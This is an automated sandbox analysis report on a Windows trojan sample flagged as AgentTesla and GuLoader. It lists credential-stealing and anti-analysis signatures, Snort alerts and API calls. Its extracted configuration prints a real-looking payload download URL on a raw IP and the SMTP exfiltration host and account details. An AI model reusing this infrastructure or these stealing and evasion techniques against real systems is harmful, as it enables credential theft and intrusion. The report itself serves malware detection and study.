Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Inject.11626.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.Inject.11626.exe
Analysis ID:635338
MD5:dd43bd8cdc55dd9c8a168f7d5e67db30
SHA1:b7b49d8b277b6cb3d3006e912ad78558872119fb
SHA256:7dc00d4ca525d39db7c57bcbcf2a17720f3e1d2eaecfc714f5e28f0e2a09633b
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected GuLoader
Snort IDS alert for network traffic
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Contains functionality to detect virtual machines (SMSW)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • SecuriteInfo.com.Trojan.Inject.11626.exe (PID: 4336 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" MD5: DD43BD8CDC55DD9C8A168F7D5E67DB30)
    • CasPol.exe (PID: 1888 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 9124 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 4392 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "muhasebe@parkhotelizmir.comzHhYkTCp0(bkmail.parkhotelizmir.comsaleseuropower2@yandex.com"}

Threatname: GuLoader

{"Payload URL": "http://185.222.57.79/SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000005.00000002.19759760809.000000001D7ED000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000000.14824947099.0000000001100000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 4 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.11.2045.10.148.33497635872030171 05/27/22-19:42:44.865082
            SID:2030171
            Source Port:49763
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.11.2045.10.148.33497635872840032 05/27/22-19:42:44.865135
            SID:2840032
            Source Port:49763
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.11.20185.222.57.7949754802018752 05/27/22-19:41:07.264505
            SID:2018752
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://185.222.57.79/SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin1"}
            Source: CasPol.exe.1888.3.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "muhasebe@parkhotelizmir.comzHhYkTCp0(bkmail.parkhotelizmir.comsaleseuropower2@yandex.com"}
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeVirustotal: Detection: 11%Perma Link
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
            Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb00 source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D74
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,1_2_0040699E

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49754 -> 185.222.57.79:80
            Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.11.20:49763 -> 45.10.148.33:587
            Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49763 -> 45.10.148.33:587
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://185.222.57.79/SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin1
            Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
            Source: Joe Sandbox ViewASN Name: EKSENBILISIMTR EKSENBILISIMTR
            Source: global trafficHTTP traffic detected: GET /SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.222.57.79Cache-Control: no-cache
            Source: global trafficTCP traffic: 192.168.11.20:49763 -> 45.10.148.33:587
            Source: global trafficTCP traffic: 192.168.11.20:49763 -> 45.10.148.33:587
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: CasPol.exe, 00000005.00000002.19759961032.000000001D813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000005.00000002.19734742085.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.79/SALES/muhasebe
            Source: CasPol.exe, 00000005.00000002.19759961032.000000001D813000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2HBIa742d4finT.com
            Source: CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#Attribution
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#DerivativeWorks
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#Distribution
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#Notice
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#Reproduction
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#ShareAlike
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: CasPol.exe, 00000005.00000002.19760423479.000000001D872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.parkhotelizmir.com
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, FRATERNATE.exe.5.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yogqTE.com
            Source: CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%4
            Source: CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: mail.parkhotelizmir.com
            Source: global trafficHTTP traffic detected: GET /SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.222.57.79Cache-Control: no-cache
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405809

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: Process Memory Space: CasPol.exe PID: 4392, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: Process Memory Space: CasPol.exe PID: 4392, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00406D5F1_2_00406D5F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_70E21BFF1_2_70E21BFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339CE661_2_0339CE66
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339DF3D1_2_0339DF3D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033955261_2_03395526
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033985151_2_03398515
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033961011_2_03396101
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033985631_2_03398563
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398B951_2_03398B95
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398A3A1_2_03398A3A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033986261_2_03398626
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033958101_2_03395810
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033968121_2_03396812
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033966161_2_03396616
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398A081_2_03398A08
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033988771_2_03398877
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033968BB1_2_033968BB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033966A31_2_033966A3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339E8991_2_0339E899
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339EEF91_2_0339EEF9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339F0EF1_2_0339F0EF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033966CB1_2_033966CB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398ECB1_2_03398ECB
